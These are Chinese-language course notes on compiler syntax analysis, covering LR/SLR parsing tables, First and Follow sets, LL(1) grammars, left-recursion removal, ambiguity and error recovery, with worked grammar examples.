  1. 把状态 0($S_0$)和符号 $$ $ $$ 压入初始为空的栈里。

  2. 设置栈顶元素中的状态为 $s$,当前读入的符号为 $a$。

  3. 反复执行以下各动作,直到分析成功或发现语法错误为止:

    1. 移进:若 $\text{Action}[s, a]=S_i$,(Shift,移进)则把 $a$ 和状态 $i$ 压进栈,读下一个输入符号到 $a$ 中

    2. 归约:若 $\text{Action}[s, a]=r_j$ (reduce,即产生式 $j=A \rightarrow X_{m-k+1} X_{m-k+2} \cdots X_m$),则出栈 $k$ 项,把 $A$ 和 $s_{new}=\text{Goto}[s', A]$ 进栈,其中 $s'$ 是出栈 $k$ 项后新的栈顶元素中的状态

    3. 接受:若 $$\text{Action}[s, $]=\text{accept}$$,则分析成功,结束

  4. 出错:若 $$\text{Action}[s, a]=\text{error}$$,则转由错误处理程序

举例说明

文法:

$$ \begin{aligned} E &\rightarrow T E' \ E' &\rightarrow + T E' | \varepsilon \ T &\rightarrow F T' \ T' &\rightarrow * F T' | \varepsilon \ F &\rightarrow ( E ) | id \end{aligned} $$

假设输入字符串为 $id + id * id$。

image-20241114155742253

image-20241114155750011

分析表结构

分析表的第一列是状态,第二列是 Action 部分,由 $|T|+1$ 列构成,第三列是 Goto 部分,由 $|V|$ 列构成。

$$ \text{Action}[s, a] = \begin{cases} 移进 S_i & a\ 和状态\ i\ 进栈 \ 归约 r_j & \text{出栈 k 项,然后}\ A\ \text{和 Goto[s',A] 进栈} \ 接受 & \text{接受} \ 出错 & \text{出错} \end{cases} $$

其中:

  • $s$ 是状态
  • $a$ 是读入的终结符(单词)或 $$ $ $$
  • $k$ 是 $j$ 号产生式 $A \rightarrow \beta$ 的长度 $|\beta|$
  • $s'$ 是出栈 $k$ 项后新的栈顶元素中的状态

LR (0) 分析表中的冲突

移进规约冲突

假设有一个项集 $I$ 包含以下项目:

  • $A \rightarrow \alpha \cdot a \beta$
  • $B \rightarrow \gamma \cdot$

在这种情况下,如果当前输入符号是 $a$:

  • 根据项目 $A \rightarrow \alpha \cdot a \beta$,分析器会尝试移进符号 $a$,以期待未来能够归约到 $A$
  • 根据项目 $B \rightarrow \gamma \cdot$,分析器会尝试进行归约操作,把当前栈顶的 $\gamma$ 归约为 $B$

这就导致了移进 - 归约冲突。

移进规约冲突解决方案:SLR 分析表

SLR:Simple LR。

依据 $\text{Follow}$ 集来选择是否进行归约。

如果 $I={X \rightarrow \alpha \cdot b \beta$,$A \rightarrow \alpha \cdot$,$B \rightarrow \alpha \cdot}$,且若 ${b}$、$\text{Follow}(A)$、$\text{Follow}(B)$ 两两不交,则面对应当前读入符号 $a$,状态 $I$ 的解决方法:

  1. 若 $a=b$,则移进
  2. 若 $a \in \text{Follow}(A)$,则用 $A \rightarrow \alpha$ 进行归约
  3. 若 $a \in \text{Follow}(B)$,则用 $B \rightarrow \alpha$ 进行归约
  4. 此外,报错

注:此处只举例了两个规约项、一个移入项,实际上可以有更多个规约项、移入项。

每个 SLR (1) 文法都是无二义性的,但是存在很多不是 SLR (1) 的无二义性文法。

SLR 原理:可行前缀(Viable Prefix)

不是所有的最右句型的前缀都可以出现在栈中,因为语法分析器在移入时 不能越过句柄

可行前缀 (Viable Prefix):某个最右句型的前缀,且没有越过该句型的句柄的右端。

有效项:如果存在 $S \Rightarrow \alpha Aw \Rightarrow \alpha \beta_1 \beta_2 w$,那么我们说项 $A \rightarrow \beta_1 \cdot \beta_2$ 对 $\alpha \beta_1$ 有效。

当我们知道 $A \rightarrow \beta_1 \cdot \beta_2$ 对 $\alpha \beta_1$ 有效:

  • 如果 $\beta_2$ 不等于空,表示句柄尚未出现在栈中,应继续移进或者等待归约
  • 如果 $\beta_2$ 等于空,表示句柄出现在栈中,应归约

如果某个时刻存在两个有效项要求执行不同的动作,那么就应该设法解决冲突。

冲突实际上表示可行前缀可能是两个最右句型的前缀,第一个包含了句柄,而另一个尚未包含句柄。

SLR 解决冲突的方法:假如要按照 $A \rightarrow \beta$ 进行归约,那么得到的新句型中 $A$ 后面跟着的是下一个输入符号。因此只有当下一个输入在 $\text{Follow}(A)$ 中时才可以归约。

  • 如果在文法 $G$ 的 LR (0) 自动机中,从初始状态出发,沿着标号为 $\gamma$ 的路径到达一个状态,那么这个状态对应的项集就是 $\gamma$ 的 有效项集

  • 回顾确定分析动作的方法,就可以知道我们实际上是按照有效项来确定的

    为了避免冲突,归约时要求下一个输入符号在 $\text{Follow}(A)$ 中,且 SLR 语法保证了 $\text{Follow}$ 集合两两不交

SLR 语法分析器的弱点

没有展望符号

没有展望符号,不能确定规约之后还是不是可行前缀(即使 $\text{Follow}$ 集合得到满足也不保证)

举例:

  1. 假设此时栈中的符号串为 $\beta \alpha$,输入符号是 $a$
  2. 如果 $\beta A a$ 不能是某个最右句型的前缀,那么即使 $a$ 在某个句型中跟在 $A$ 之后,仍然不应该按照 $A \rightarrow \alpha$ 归约。

不能提前确定信息

$A \rightarrow \alpha \cdot$ 出现在项集中的条件:

  1. 首先 $A \rightarrow \cdot \alpha$ 出现在某个项集中,然后逐步读入 / 归约到 $\alpha$ 中的符号,点不断后移,直到末端

  2. 而 $A \rightarrow \cdot \alpha$ 出现的条件是 $B \rightarrow \beta \cdot A \gamma$ 出现在项中

    期望首先按照 $A \rightarrow \alpha$ 归约,然后将 $B \rightarrow \beta \cdot A \gamma$ 中的点后移到 $A$ 之后

  3. 显然,在按照 $A \rightarrow \alpha$ 归约时要求下一个输入符号是 $\gamma$ 的第一个符号

  4. 但是从 LR (0) 项集中不能确定这个信息

💾

语法分析 II

2024年11月10日 22:05

文法的设计方法

消除二义性

一些二义性文法可以被改成等价的无二义性文法

例子:dangling-else

$$ \begin{aligned} \text{stmt} \rightarrow& \textbf{if} \ \text{expr} \ \textbf{then} \ \text{stmt} \ |& \textbf{if} \ \text{expr} \ \textbf{then} \ \text{stmt} \ \textbf{else} \ \text{stmt} \ |& \text{other} \end{aligned} $$

在这个语法下,$\textbf{if} \ \text{expr}_1 \ \textbf{then} \ \textbf{if} \ \text{expr}_2 \ \textbf{then} \ \text{stmt}_1 \ \textbf{else} \ \text{stmt}_2$ 有两棵语法树:

image-20241109131909671

即:这个 else 既可以和第一个 then 匹配,也可以和第二个 then 匹配。

消除 dangling-else 二义性

引入 matched_stmt 表示匹配好的语句,文法如下:

$$ \begin{aligned} \text{stmt} \rightarrow& \text{matched_stmt} | \text{open_stmt} \ \text{matched_stmt} \rightarrow& \textbf{if} \ \text{expr} \ \textbf{then} \ \text{matched_stmt} \ \textbf{else} \ \text{matched_stmt} \ |& \text{other} \ \text{open_stmt} \rightarrow& \textbf{if} \ \text{expr} \ \textbf{then} \ \text{stmt} \ |& \textbf{if} \ \text{expr} \ \textbf{then} \ \text{matched_stmt} \ \textbf{else} \ \text{open_stmt} \end{aligned} $$

即:通过引入新的非终结符,来保证 else 与最近未匹配的 then 匹配。

例子:近对称符号串

文法 $G$ 的产生式如下:

$$ S \rightarrow aSb ,|, bSa ,|, SS ,|, ba ,|, ab $$

$L(G)$:

  • 最小单元:$abab,aabb,baba,bbaa$
  • 最小单元外侧可以对称着包 $a\cdots b$ 或者 $b\cdots a$
  • 然后包完了还可以重复

二义性示例

$G$ 是二义性的,例如 $ababab$ 有两个不同的最左推导:

  1. $S \Rightarrow SS \Rightarrow abS \Rightarrow abSS \Rightarrow ababab$
  2. $S \Rightarrow SS \Rightarrow SSS \Rightarrow abS \Rightarrow ababab$

等价上下文无关文法

$$ \begin{aligned} S &\rightarrow TS ,|, T \ T &\rightarrow aB ,|, bA \ A &\rightarrow a ,|, bAA \ B &\rightarrow b ,|, aBB \end{aligned} $$

消除文法中的左递归

文法左递归:$A\Rightarrow^+A\alpha$

  • 直接左递归:直接左递归经过一次推导就可以看出文法存在左递归 $$ A \rightarrow A \alpha \mid \beta $$
  • 间接左递归:间接左递归是指需多次推导才可以看出文法存在左递归 $$ S \rightarrow A a \mid b \ A \rightarrow S d \mid \varepsilon $$

消除直接左递归

将原始规则 $A \rightarrow A \alpha \mid \beta$ 转换为:

$$ \begin{aligned} A &\rightarrow \beta A' \ A' &\rightarrow \alpha A' \mid \varepsilon \end{aligned} $$

消除间接左递归

  1. 先转换成直接左递归:

    使用替换法,将 $S$ 的规则替换为 $A$ 的规则:

    $$ \begin{aligned} S &\rightarrow A a \mid b \ A &\rightarrow S d \mid \varepsilon \end{aligned} $$

    转换为:

    $$ \begin{aligned} S &\rightarrow A a \mid b \ A &\rightarrow A a d \mid b d \mid \varepsilon \end{aligned} $$

  2. 再消除左递归:

    $$ \begin{aligned} A &\rightarrow b d A' \mid A' \ A' &\rightarrow a d A' \mid \varepsilon \end{aligned} $$

消除所有左递归的算法

  1. 将文法 $G$ 的非终结符顺序整理为 $A_1, A_2, \cdots, A_n$。

  2. 逐步消除间接左递归

    1. 对于每个 $i$ 从 1 到 $n$,对于每个 $j$ 从 1 到 $i-1$,将形如 $A_i \rightarrow A_j r$ 的规则替换为:

      $$ A_i \rightarrow \delta_1 r \mid \delta_2 r \mid \cdots \mid \delta_k r $$

      其中,$A_j \rightarrow \delta_1 \mid \delta_2 \mid \cdots \mid \delta_k$ 是当前 $A_j$ 的所有产生式。

    2. 然后,消除 $A_i$ 规则中的直接左递归。

    理解:循环操作,先避免 $A_i \rightarrow A_j r\ (j < i)$ 的退化,再消除 $A_i$ 的左递归,从而避免了所有非终结符的左递归

  3. 化简得到的文法

预测分析法

预测分析法:试图从开始符号推导出输入符号串

  • 以开始符号 $S$ 作为初始的当前句型
  • 每次为最左边的非终结符号选择适当的产生式
    • 通过查看下一个输入符号来选择这个产生式
    • 有多个可能的产生式时预测分析法无能为力

问题:当两个产生式具有相同的前缀时无法预测

文法:

$$ \begin{aligned} \text{stmt} \rightarrow& \textbf{if} \ \text{expr} \ \textbf{then} \ \text{stmt} \ \textbf{else} \ \text{stmt} \ |& \textbf{if} \ \text{expr} \ \textbf{then} \ \text{stmt} \end{aligned} $$

处理办法:提取左公因子

新文法:

$$ \begin{aligned} \text{stmt} \rightarrow& \textbf{if} \ \text{expr} \ \textbf{then} \ \text{stmt} \ \text{elsePart} \ \text{elsePart} \rightarrow& \textbf{else} \ \text{stmt} \mid \varepsilon \end{aligned} $$

提取左公因子

含有左公因子的文法:

$$ A \rightarrow \alpha \beta_1 \mid \alpha \beta_2 $$

提取左公因子:

$$ \begin{aligned} A &\rightarrow \alpha A' \ A' &\rightarrow \beta_1 \mid \beta_2 \end{aligned} $$

自顶向下的语法分析

定义:自顶向下分析是从文法的开始符号出发,试构造出一个 最左推导,从左至右匹配输入的单词串。

步骤

  1. 推导替换
    • 当前被替换的非终结符号为 $A$
    • 当前从左至右读到的单词符号为 $a$
  2. 匹配产生式
    • 如果 $A$ 的产生式为:$A \rightarrow \alpha_1 \mid \alpha_2 \mid \cdots \mid \alpha_n$
    • 其中由 $\alpha_i(1 ≤ i ≤ n)$ 推导出的第一个终结符号为 $a$,则选择产生式 $A \rightarrow \alpha_i$ 构造最左推导
  3. 策略
    • 用 $\alpha_i$ 替换 $A$,进行预测分析
    • 如果匹配失败,则进行回溯尝试

关键点

  • 自顶向下分析通过 试探和回溯 来构造符合输入的句子结构。
  • 最左推导是核心策略,确保每一步都尽可能匹配输入的左边部分。

回溯的解决

对文法加什么样的限制可以保证没有回溯?

在自顶向下的分析技术中,通常使用向前看几个符号来唯一地确定产生式(这里只假定只看一个符号)。

  1. 假设当前句型是 $xA\beta$,而输入是 $xa\cdots$,那么选择产生式 $A \rightarrow \alpha$ 的 必要条件 是下列之一:

    • $\alpha \Rightarrow^* \varepsilon$ 且 $\beta$ 以 $a$ 开头(可以用更强的条件替代:在某个句型中 $a$ 跟在 $A$ 之后)
    • $\alpha \Rightarrow^* a\cdots$
  2. 如果按照这两个条件选择时能够保证唯一性,那么我们就可以避免回溯

总结:

  • 使用向前看符号(展望符号)来唯一确定产生式
  • 确保选择产生式时满足特定条件以避免回溯

First 和 Follow

First 集合

First:可以从某个符号串 $\alpha$ 推导出的串的首符号(终结符)的集合。

  • 形式化定义:

    $$ \text{First}(\alpha) = {a \mid \alpha \Rightarrow^* a\cdots, a \in V_T} $$

    其中,$V_T$ 是终结符的集合

  • 特别地,如果 $\alpha \Rightarrow^* \varepsilon$,即 $\alpha$ 可以推导出空串 $\varepsilon$,那么我们规定 $\varepsilon \in \text{First}(\alpha)$

简单来说,First 集合包含了 $\alpha$ 能够推导出的所有串的第一个终结符

Follow 集合

Follow:可能在某些句型中紧跟在非终结符 $A$ 右边的终结符的集合。

  • 形式化定义:

    $$ \text{Follow}(A) = {a \mid S \Rightarrow^* \cdots Aa\cdots, a \in V_T} $$

    其中,$S$ 是开始符号

  • 如果 $A$ 是某个句型的最右符号时,那么 $$ $ $$ 也属于 $\text{Follow}(A)$

简单来说,Follow 集合包含了在某些推导过程中可能出现在 $A$ 右边的终结符

计算 First 集合

计算单个符号 X 的 First 集合

终结符:如果 $X$ 是终结符,那么 $\text{First}(X) = {X}$。

非终结符

  1. 如果 $X$ 是非终结符,并且 $X \rightarrow Y_1Y_2\cdots Y_k$ 是一个产生式:

    • 如果某个 $a$ 在 $\text{First}(Y_i)$ 中,并且 $\varepsilon$ 在 $\text{First}(Y_1), \text{First}(Y_2), \cdots, \text{First}(Y_{i-1})$ 中,那么 $a$ 也在 $\text{First}(X)$ 中

      人话:如果 $\varepsilon$ 在这些 $\text{First}(Y_i)$ 中,那么就意味着 $Y_i \Rightarrow^* \varepsilon$,也就可以忽略前面的

    • 如果 $\varepsilon$ 在 $\text{First}(Y_1), \text{First}(Y_2), \cdots, \text{First}(Y_k)$ 中,那么 $\varepsilon$ 也在 $\text{First}(X)$ 中

      人话:所有的子部分都可以推出空串,那么 $X$ 也可以推出空串

  2. 如果 $X$ 是非终结符,并且 $X \rightarrow \varepsilon$ 是一个产生式,那么 $\varepsilon$ 在 $\text{First}(X)$ 中

计算产生式右部 $X_1 X_2 \cdots X_n$ 的 First 集合

  1. 向集合中加入 $\text{First}(X_1)$ 中所有非 $\varepsilon$ 的符号
  2. 如果 $\varepsilon$ 在 $\text{First}(X_1)$ 中,再加入 $\text{First}(X_2)$ 中的所有非 $\varepsilon$ 的符号
  3. 依次类推,直到所有 $X_i$ 被处理完
  4. 如果 $\varepsilon$ 在所有的 $\text{First}(X_i)$ 中,则将 $\varepsilon$ 加入 $\text{First}(X_1 X_2 \cdots X_n)$ 中

计算 Follow 集合

  1. 将右端结束标记 $$$ $$ 放到 $\text{Follow}(S)$ 中。

  2. 不间断迭代以下规则,直到所有的 Follow 集合都不再增长为止:

    • 如果存在产生式 $A \rightarrow \alpha B \beta$,那么 $\text{First}(\beta)$ 中所有非 $\varepsilon$ 的符号都在 $\text{Follow}(B)$ 中

      人话:此时即存在式子可以推导出 $Bx, x \in \text{First}(\beta)$

    • 如果存在产生式 $A \rightarrow \alpha B$,或者 $A \rightarrow \alpha B \beta$ 且 $\text{First}(\beta)$ 包含 $\varepsilon$,那么 $\text{Follow}(A)$ 中的所有符号都加入到 $\text{Follow}(B)$ 中

      人话:此时即  $\text{Follow}(A) \sub \text{Follow}(B)$,因为对于每个 $A$ 出现的式子,我们都可以执行这个替换,从而使得原本接在 $A$ 后面的字符接到 $B$ 后面

LL (1) 文法

定义:对于文法中任意两个不同的产生式 $A \rightarrow \alpha | \beta$:

  1. 不存在终结符号 $a$ 使得 $\alpha$ 和 $\beta$ 都可以推导出以 $a$ 开头的串

  2. $\alpha$ 和 $\beta$ 最多只有一个可以推导出空串

  3. 如果 $\beta$ 可以推导出空串,那么 $\alpha$ 不能推导出以 $\text{Follow}(A)$ 中任何终结符号开头的串

    理解:如果可以,那么产生了二义性:

    • 对于 $A$ 推导为 $\beta$,然后再推导得到空串 $\varepsilon$,接着后接 $\text{Follow}(A)$ 中的字符
    • 对于 $A$ 推导为 $\alpha$,然后再推导得到 $\text{Follow}(A)$ 中的字符

注:这里不一定只有 $\alpha$ 和 $\beta$ 两个产生式,而是所有可能的产生式,这里只是简写了(有 “任意两个” 这一条件)。

这里主要是为了自顶向下的语法分析的时候能确定找到唯一路径。

等价条件

对于文法中任意两个不同的产生式 $A \rightarrow \alpha | \beta$:

  • $\text{First}(\alpha) \cap \text{First}(\beta) = \varnothing$ (条件 1, 2)
  • 如果 $\varepsilon \in \text{First}(\beta)$,那么 $\text{First}(\alpha) \cap \text{Follow}(A) = \varnothing$ (条件 3)

LL (1) 文法的说明

输入串以 $$$ $$ 为结束标记,这相当于对文法作扩充,即增加产生式 $$S' \rightarrow S$ $$,所以 $\text{Follow}(S)$ 一定包含 $$$ $$。

预测分析表的构造方法

  • 输入:文法 $G$

  • 输出:预测分析表 $M$,用于指导预测分析器如何根据当前输入符号和栈顶符号做出解析决策

    其中每一项 $M[A, a]$ 表明当前栈顶是 $A$,输入符号是 $a$ 时,应该使用哪个产生式

  • 构造方法:

    • 对于文法 $G$ 的每个产生式 $A \rightarrow \alpha$:

      对于 $\text{First}(\alpha)$ 中的每个终结符号 $a$,将 $A \rightarrow \alpha$ 加入到 $M[A, a]$ 中;

      如果 $\varepsilon \in \text{First}(\alpha)$,那么对于 $\text{Follow}(A)$ 中的每个符号 $b$,将 $A \rightarrow \alpha$ 加入到 $M[A, b]$ 中。

    • 最后在所有的空白条目中填入 $\text{error}$

image-20241115024536309

LL (1) 文法解析例子

假设有以下文法:

$$ \begin{aligned} E &\rightarrow T E' \ E' &\rightarrow + T E' | \varepsilon \ T &\rightarrow F T' \ T' &\rightarrow * F T' | \varepsilon \ F &\rightarrow ( E ) | id \end{aligned} $$

假设输入字符串为 $id + id * id$。

那么,LL (1) 分析器的工作流程如下:

首先计算出 First 集合:

$$ \begin{aligned} \text{First}(E) &= {(, id)} \ \text{First}(E') &= {+, \varepsilon} \ \text{First}(T) &= {(, id)} \ \text{First}(T') &= {*, \varepsilon} \ \text{First}(F) &= {(, id)} \end{aligned} $$

  1. 初始状态:
    • 输入:$$id + id * id $ $$($$ $ $$ 是输入结束符)
    • 符号栈:$$E $ $$(注意,左边是栈顶
  2. 根据预测:
    • 当前栈顶 $E$ 和输入符号 $id$ 使我们选择产生式 $E \rightarrow T E'$
    • 更新符号栈为 $$T E' $ $$
  3. 继续向下:
    • 栈顶 $T$ 和输入符号 $id$ 选择 $T \rightarrow F T'$
    • 更新符号栈为 $$F T' E' $ $$
  4. 接着:
    • 栈顶 $F$ 和输入符号 $id$ 使用 $F \rightarrow id$,匹配后弹出 $id$
    • 更新符号栈为 $$T' E' $ $$
  5. 重复此过程,运用 First 集合和下一个输入符号进行预测,以此类推

错误处理

目的:继续完成整段程序的语法分析

思路:将预测分析表中的空白位置以某种方式填充

两种方法:恐慌模式 / 短语层次的恢复

语法错误的类型

  • 词法错误:标识符 / 关键字拼写错误等
  • 语法错误:分号位置错误,${ }$ 不匹配
  • 语义错误:运算符和变量类型不匹配
  • 逻辑错误:编译器看不出来,例如 = 和 == 写错导致的错误(但可以过编译)

恐慌模式

思路:忽略输入中的部分符号,直到出现特定的 “同步词法单元”,我们认为 “同步词法单元(sync)” 和之前的内容都属于当前符号(出错的这个符号),然后跳过该段,继续分析

省流:当分析器遇到错误时,它会忽略一些输入符号,直到遇到某个可以继续解析的符号。

方法:将 $\text{First}(A)$ 和 $\text{Follow}(A)$ 加入 $A$ 的 同步集合 中。在预测分析表中,标记为 sync

假设出错时,我们在试图识别一个非终结符号 $A$ (栈顶为 $A$),遇到了终结符号 $a$

  • 如果 $M[A, a]$ 为空,什么也不做,直接忽略 $a$ (将之视为多打了的字符)
  • 如果 $M[A, a]$ 为 sync,则跳过 $a$,弹出栈顶的 $A$ (认为从当前位置一直到 $a$ 都属于 $A$ 的范畴),然后尝试继续正常的语法分析过程

短语层次的恢复

  • 预测分析表 的空白位置,填入 指向错误处理例程的指针

  • 错误处理例程的可能行为:

    • 改变 / 插入 / 删除符号
    • 发送错误信息
    • 弹栈
  • 要避免死循环

💾

语法分析 I

2024年11月10日 22:04

概述

程序设计语言构造的语法可使用 上下文无关文法BNF 表示法 来描述

语法分析器的作用

graph LR
    A[源程序] --> B[词法分析器] -->|Token| C[语法分析器] --> D[分析树]
    C -->|取下一个Token| B
  • 功能:根据文法规则,从源程序单词符号串中识别出语法成分,并进行语法检查
  • 基本任务:识别符号串 $S$ 是否为某个合法的语法单元

语法分析器的种类

分类

  • 通用语法分析器
    • 可以对任意文法进行语法分析
    • 效率很低,不适合用于编译器
  • 自顶向下 的语法分析器
    • 从语法分析树的根部开始构造语法分析树
  • 自底向上 的语法分析器
    • 从语法分析树的叶子开始构造语法分析树

后两种方法

  • 通常从左到右逐个扫描词法单元
  • 为了保证效率,只针对特定类型的文法,但是这些文法足以用来描述常见的程序设计语言

文法(Grammar)

定义:文法 $G = (V_T, V_N, S, P)$,其中:

  • $V_T$ 是一个非空有穷的 终结符号(terminal) 集合

  • $V_N$ 是一个非空有穷的 非终结符号(nonterminal) 集合,且 $V_T \cap V_N = \varnothing$

  • $P = { \alpha \to \beta | \alpha \in (V_T \cup V_N)^\text{且至少包含一个非终结符号}, \beta \in (V_T \cup V_N)^}$,称为 产生式(production) 集合

    • BNF 范式:产生式可以写成 $A ::= \alpha$ 或 $A \rightarrow \alpha$
    • $A \rightarrow \alpha_1 \quad A \rightarrow \alpha_2$ 可以缩写为:$A \rightarrow \alpha_1 | \alpha_2$
  • $S \in V_N$,称为 开始符号(start symbol)

    $S$ 必须在某个产生式的左部至少出现一次

关于文法的一些约定

通常可以不用将文法 $G$ 的四元组显式地表示出来,而只需将产生式写出,一般约定:

  • 第一条产生式 $P_0$ 的左部是 开始符号
  • 尖括号 $<>$ 括起来的是 非终结符号,而 不用尖括号 的是 终结符号
  • 或者 大写字母 $ABC$ 表示 非终结符号小写字母 $abc$ 表示 终结符号
  • 小写的希腊字母 $\alpha \beta \gamma$ 表示 (可能为空的) 文法符号串

另外也可以把 $G$ 表示为 $G[S]$,其中 $S$ 为开始符号

上下文无关文法(Context-free grammar,CFG)

所有产生式的左边只有一个非终结符号,即

  • 产生式的形式为:$A \rightarrow \beta$
  • 因此不需要任何上下文(context)就可以对 $A$ 进行推导

上下文无关文法描述的语言称为上下文无关语言

推导 / 规约

直接推导 / 直接规约

直接推导(Immediate Derivation)/ 直接规约(Immediate Reduction):若某个串 $\alpha$ 可以根据某条文法一步化为串 $\beta$,则称:

  • $\alpha$ 可以直接推导出 $\beta$
  • $\beta$ 可以直接归约到 $\alpha$

标准定义:令语法 $G=(V_T, V_N, S, P)$,若 $\alpha \to \beta \in P$,且 $\gamma, \delta \in (V_T \cup V_N)^*$,则称 $\gamma \alpha \delta$ 可以直接推导出 $\gamma \beta \delta$,表示为:

$$ \gamma \alpha \delta \Rightarrow \gamma \beta \delta $$

如果 $\gamma \alpha \delta$ 直接推导(左到右) 出 $\gamma \beta \delta$,即 $\gamma \alpha \delta \Rightarrow \gamma \beta \delta$,则称 $\gamma \beta \delta$ 直接归约(右到左) 到 $\gamma \alpha \delta$。

规约是推导的逆过程。

推导(Derivation)

若一个直接推导序列为:

$$ \alpha_0 \Rightarrow \alpha_1 \Rightarrow \alpha_2 \Rightarrow \ldots \Rightarrow \alpha_n \quad (n > 0) $$

可以表示为:

$$ \alpha_0 \Rightarrow^+ \alpha_n $$

拓展定义 $\alpha_0 \Rightarrow^* \alpha_n$ 为:

  • 要么 $\alpha_0 = \alpha_n$ (直接就是)
  • 要么 $\alpha_0 \Rightarrow^+ \alpha_n$ (经过几次推导)

这里类似正则表达式,在正则表达式中:

  • + 代表一次或者多次匹配
  • * 代表零次或者多次匹配

最左推导和最右推导

对于文法 $G$ 和字符串 $w$,如果 $w \in L(G)$,即 $w$ 可以由 $G$ 生成,那么有如下构造推导 $S \Rightarrow^* w$ 的方法:

  • 最左推导:若 $\alpha A \beta \Rightarrow_{lm} \alpha \gamma \beta$, $\alpha \in V_T^*$,即 $\alpha$ 是一个由终结符组成的字符串
  • 最右推导:若 $\alpha A \beta \Rightarrow_{rm} \alpha \gamma \beta$, $\beta \in V_T^*$,即 $\beta$ 是一个由终结符组成的字符串

最左推导每次替换最左边的非终结符,而最右推导每次替换最右边的非终结符。

句型 / 句子 / 语言

句型(sentential form)

如果 $S \Rightarrow^* \alpha$,那么 $\alpha$ 是文法的句型

  • 句型 可能既包含非终结符号,又包含终结符号
  • 句型也 可以是空串

型 → 行,即可以达到的状态

句子(sentence)

文法的句子是 不包含非终结符号 的句型(即全是终结符号,最终状态)

子 → 子集(即最具体的句子)

语言

文法 $G$ 的语言是 $G$ 的所有 句子 的集合,记为 $L(G)$

$w$ 在 $L(G)$ 中当且仅当 $w$ 是 $G$ 的句子,即 $S \Rightarrow^* w$

证明文法生成的语言

基本步骤:

  1. 首先证明 $L(G) \subseteq L$(文法 $G$ 生成的任意句子都属于语言 $L$)
  2. 然后证明 $L \subseteq L(G)$(语言 $L$ 的任意句子都可以用文法 $G$ 生成)
  3. 一般可以使用 数学归纳法
    • $L(G)\subseteq L$:按推导序列的长度来归纳
    • $L\subseteq L(G)$:按符号串长度来构造推导序列

文法生成语言的例子

文法 $G$:$$ S \rightarrow (S)S \mid \varepsilon $$

语言 $L$:所有具有对称括号的串。

$L(G) \subseteq L$ 的证明:依据 推导序列的长度 来归纳

  • 归纳基础:推导长度为 $n=1$, $S \Rightarrow \varepsilon$,满足括号对称。

  • 归纳步骤:假设长度小于 $n$ 的推导都能得到括号对称的句子。考虑推导步骤为 $n$ 的最左推导:

    $$ S \Rightarrow_{lm} (S)S \Rightarrow_{lm}^{} (x)S \Rightarrow_{lm}^{} (x)y $$

    其中 $x$ 和 $y$ 的 推导步骤 都小于 $n$,因此 $x$ 和 $y$ 也是括号对称的句子

    即依据 推导路径长度 来进行归纳

$L \subseteq L(G)$ 的证明:依据 生成句子长度 来进行归纳

  • 注意:指括号对称的串的长度必然是偶数。

  • 归纳基础:如果指括号对称的串的长度为 $0$,那么它可以从 $S$ 推导得到。

  • 归纳步骤:假设长度小于 $2n$ 的指括号对称的串都能被 $S$ 推导得到,$w$ 是括号对称且长度为 $2n$ 的串。

    那么,$w$ 必然以左括号开头,且可以写成 $(x)y$ 的形式,其中 $x$ 也是括号对称的。因为 $x$、$y$ 的长度都小于 $2n$ ,根据归纳假设,$x$ 和 $y$ 都可以从 $S$ 推导得到,进而 $w$ 可以从 $S$ 推导得到: $$ S \Rightarrow_{lm} (S)S \Rightarrow_{lm}^{} (x)S \Rightarrow_{lm}^{} (x)y $$

语法解析树(Parse Tree)

语法解析树:推导的一种图形表示形式

  • 根节点:文法的开始符号 $S$
  • 叶子节点:非终结符号、终结符号或 $\varepsilon$
  • 内部节点(即非叶子节点):非终结符号
    • 每个内部节点往下推,表示某个产生式的一次应用
    • 内部节点的标签为产生式左部,该节点的子节点从左到右对应产生式的右部

image-20241109121121869

画的时候可以从顶向下推导,也可以从底向上规约。

几点说明:

  • 有时允许根不是开始符号(对应于某个短语)
  • 树的叶子组成的序列是根的文法符号的句型
  • 一棵解析树可对应多个推导序列,但是解析树和最左(右)推导序列之间具有一一对应关系

二义性 / 歧义性(Ambiguity)

定义

  • 如果一个文法中存在某个句子有两棵解析树,那么该句子是 二义性的
  • 如果一个文法产生二义性的句子,则称这个文法是 二义性的
  • 否则,该文法是 无二义性的

举例

考虑下面的表达式文法 $G2[E]$,其产生式如下:

$$ E \rightarrow E + E \mid E * E \mid (E) \mid a $$

对于句子 $a + a * a$,有如下两个最左推导:

$$ E \Rightarrow E + E \Rightarrow a + E \Rightarrow a + E * E \Rightarrow a + a * E \Rightarrow a + a * a $$

$$ E \Rightarrow E * E \Rightarrow E + E * E \Rightarrow a + E * E \Rightarrow a + a * E \Rightarrow a + a * a $$

image-20241109121121869

几点说明

  1. 一般来说,程序语言存在 无二义性文法

  2. 在能够驾驭的情况下,经常使用二义性文法

    条件语句通常使用二义性文法描述。

  3. 对于任意一个上下文无关文法,不存在一个算子,判定它是无二义性的;

    但能够给出一组充分条件,满足这组充分条件的文法是无二义性的。

  4. 存在 先天二义性语言,即语言本身就是二义性,无论采用何种文法描述。

    例如:${ a^i b^i c^j | i, j \geq 1 } \cup { a^i b^j c^j | i, j \geq 1 }$

    存在一个二义性的句子 $a^k b^k c^k$。

上下文无关文法和正则表达式

上下文无关文法比正则表达式的能力 更强

  • 所有的正则语言都可以使用上下文无关文法描述。
  • 但是一些用上下文无关文法描述的语言不能用正则文法描述。

用上下文无关文法描述的语言不都能用正则文法描述

  1. 首先证明:存在上下文无关文法 $S \rightarrow aSb \mid ab$ 描述了语言 ${ a^n b^n | n > 0 }$,但是它 无法用 DFA 识别

  2. 反证法:假设 DFA 识别该语言,设这个文法有 $k$ 个状态。

    那么在其尝试识别 $a^{k+1}$ (即输入串中有 $k+1$ 个 $a$)的输入串时,必然两次到达同一个状态($a$ 到 $a^k$ 最多用 $k$ 个状态,再来一个肯定重复,也即抽屉原理)。

    设自动机在第 $i$ 和第 $j$ 个输入 $a$ 时到达同一个状态(那么就形成了环路)。

    那么,因为 DFA 识别 $L$,$a^i b^i$ 必然到达接受状态。

    由于 $a^i$、$a^j$ 使得 DFA 到达同一个状态,所以 $a^j b^i$ 也必然到达接受状态。

    这与 $a^j b^i$ 不是语言的句子矛盾。

任何正则语言都可以表示为上下文无关文法的语言

首先,任何正则语言都必然有一个等价的 NFA。

而对于任意的 NFA 可以构造如下的上下文无关文法:

  1. 对 NFA 的每个状态 $i$,创建非终结符号 $A_i$
  2. 如果有 $i$ 在输入 $a$ 上到达 $j$ 的转换,增加产生式 $A_i \rightarrow a A_j$
  3. 如果 $i$ 在输入 $\varepsilon$ 上到达 $j$,那么增加产生式 $A_i \rightarrow A_j$
  4. 如果 $i$ 是一个接受状态,增加产生式 $A_i \rightarrow \varepsilon$
